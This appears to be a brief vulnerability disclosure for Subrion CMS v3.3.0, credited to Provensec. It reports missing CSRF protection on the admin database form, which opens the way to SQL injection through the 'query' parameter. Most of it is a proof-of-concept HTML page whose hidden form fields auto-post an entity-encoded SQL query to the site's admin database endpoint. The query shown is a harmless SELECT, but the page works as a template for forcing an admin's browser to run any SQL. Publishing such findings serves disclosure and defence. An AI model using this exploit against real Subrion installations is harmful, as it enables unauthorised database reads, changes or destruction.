# Affected software: subrion
# Type of vulnerability: csrf to sql injection
# URL: http://demo.subrion.org
# Discovered by: Provensec
# Website: http://www.provensec.com
#version v3.3.0
# Proof of concept






no csrf protection on database form which made subrion to vulnerable
to database injection

vuln parameter query


poc:

<html>

  <body>
    <form action="http://demo.subrion.org/admin/database/" method="POST">
      <input type="hidden" name="query"
value="SELECT&#32;&#42;&#32;FROM&#32;&#32;&#96;sbr301&#95;albums&#96;&#32;&#32;&#96;id&#96;&#32;"
/>
      <input type="hidden" name="table" value="sbr301&#95;albums" />
      <input type="hidden" name="field" value="id" />
      <input type="hidden" name="exec&#95;query" value="Go" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>